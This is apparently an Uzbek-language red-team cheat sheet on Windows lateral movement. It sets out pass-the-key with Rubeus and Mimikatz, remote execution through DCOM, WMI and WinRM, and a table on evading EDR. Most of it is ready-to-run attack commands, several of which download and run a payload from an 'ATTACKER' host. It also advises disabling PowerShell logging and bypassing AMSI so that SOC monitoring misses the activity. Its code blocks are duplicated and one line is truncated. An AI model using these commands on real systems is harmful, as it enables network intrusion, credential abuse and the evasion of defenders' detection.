Lateral Movement
LotL OPSEC
DCOM, WMI, WinRM, Overpass-the-Hash — LotL
Overpass-the-Hash (Pass-the-Key)
NTLM hashlari o'rniga AES-256 kalitlaridan foydalanish OPSEC uchun ancha xavfsiz va shubhali NTLM autentifikatsiya loglarini (Event ID 4624 Logon Type 3) qoldirmaydi.
AES-256 oddiy Kerberos traffic kabi ko'rinadi — NTLM o'rniga Kerberos ishlatish SOC radaridan o'tib ketadi.
PowerShellPowerShell
# AES-256 kalit bilan TGT so'rab, xotiraga inject qilish (Stealth PTT)
.\Rubeus.exe asktgt /domain:domain.local /user:Administrator `
/aes256:AES_KEY_HERE /nowrap /ptt
# Pass-the-Key via Mimikatz (AES-256)
sekurlsa::pth /user:Administrator /domain:domain.local `
/aes256:AES_KEY_HERE /run:cmd.exe
.\Rubeus.exe asktgt /domain:domain.local /user:Administrator `
/aes256:AES_KEY_HERE /nowrap /ptt
# Pass-the-Key via Mimikatz (AES-256)
sekurlsa::pth /user:Administrator /domain:domain.local `
/aes256:AES_KEY_HERE /run:cmd.exe
DCOM Execution (Ninja Level)
WMI yoki PsExec dan farqli o'laroq, DCOM yangi servislar yaratmaydi. Payload lar legitim Windows ilovalar orqali bajariladi — standart EDR lardan yuqori darajada yashirinadi.
DCOM mmc.exe yoki explorer.exe ostida spawn bo'ladi — bu legitim admin process. SOC uchun eng kam shubhali usul.
PowerShellPowerShell
# MMC20.Application COM object orqali RCE
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application", "TARGET"))
$com.Document.ActiveView.ExecuteShellCommand("cmd.exe", $null, `
"/c powershell -nop -w hidden -enc", "7")
# ShellWindows orqali (explorer.exe ostida spawn bo'ladi)
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application", "TARGET"))
$com.Windows().Item().Document.Application.ShellExecute("cmd.exe", `
"/c powershell -nop -w hidden -c iex(iwr http://ATTACKER/p.ps1).Content", `
"C:\Windows\System32", $null, 0)
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application", "TARGET"))
$com.Document.ActiveView.ExecuteShellCommand("cmd.exe", $null, `
"/c powershell -nop -w hidden -enc
# ShellWindows orqali (explorer.exe ostida spawn bo'ladi)
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application", "TARGET"))
$com.Windows().Item().Document.Application.ShellExecute("cmd.exe", `
"/c powershell -nop -w hidden -c iex(iwr http://ATTACKER/p.ps1).Content", `
"C:\Windows\System32", $null, 0)
Advanced WMI (Fileless)
PsExec binary tushirmasdan native WMI so'rovlar orqali remote execution. RPC (Port 135) orqali ishlaydi.
WMI wmiprvse.exe ostida process yaratadi — Event 4688 da ko'rinadi. Fileless payload AMSI bypass talab qilishi mumkin.
PowerShellPowerShell
# Native PowerShell cmdlet orqali fileless payload delivery
Invoke-WmiMethod -ComputerName TARGET -Class Win32_Process -Name Create `
-ArgumentList "powershell.exe -nop -w hidden -c iex(iwr http://ATTACKER/p.ps1).Content"
# Native wmic binary orqali
wmic /node:TARGET process call create `
"powershell.exe -nop -w hidden -c iex(iwr http://ATTACKER/p.ps1).Content"
Invoke-WmiMethod -ComputerName TARGET -Class Win32_Process -Name Create `
-ArgumentList "powershell.exe -nop -w hidden -c iex(iwr http://ATTACKER/p.ps1).Content"
# Native wmic binary orqali
wmic /node:TARGET process call create `
"powershell.exe -nop -w hidden -c iex(iwr http://ATTACKER/p.ps1).Content"
WinRM / PSRemoting (Port 5985/5986)
SMB (445) cheklangan muhitlar uchun lateral movement kanali. Barcha traffic AES encrypted — standart HTTP (5985) da ham.
WinRM legitimate admin tool — ko'p muhitlarda sysadminlar ham ishlatadi. Traffic oddiy admin sessiyasi kabi ko'rinadi.
PowerShellPowerShell
# WinRS — PowerShell kuchli cheklangan bo'lsa
winrs -remote:TARGET cmd.exe
# Interaktiv PS session (inject qilingan token bilan)
Enter-PSSession -ComputerName TARGET
# Remote in-memory payload execution
Invoke-Command -ComputerName TARGET -ScriptBlock {
iex(iwr http://ATTACKER/payload.ps1 -UseBasicParsing).Content
}
winrs -remote:TARGET cmd.exe
# Interaktiv PS session (inject qilingan token bilan)
Enter-PSSession -ComputerName TARGET
# Remote in-memory payload execution
Invoke-Command -ComputerName TARGET -ScriptBlock {
iex(iwr http://ATTACKER/payload.ps1 -UseBasicParsing).Content
}
OPSEC Notes & Telemetry Matrix
| Texnika | Risk | EDR Telemetry | OPSEC Yechim |
|---|---|---|---|
| PsExec (SMB) | High | Event 7045 (Service Creation), 4697. EDR darhol trigger. | WMI, DCOM, WinRM dan foydalaning. |
| WMI | Medium-High | Event 4688 (wmiprvse.exe parent process). | Fileless payload, AMSI bypass. |
| PSRemoting | Medium | Event 4624 (Logon Type 3), Event 4104. | Kerberos auth, PowerShell logging ni o'chiring. |
| DCOM (MMC20) | Low | mmc.exe ostida process creation. Yuqori stealth. | Eng yashirin lateral movement. |
| Overpass-the-Hash | Low | Event 4624 Logon Type 9. AES normal Kerberos. | AES-256 ishlating — NTLM emas. |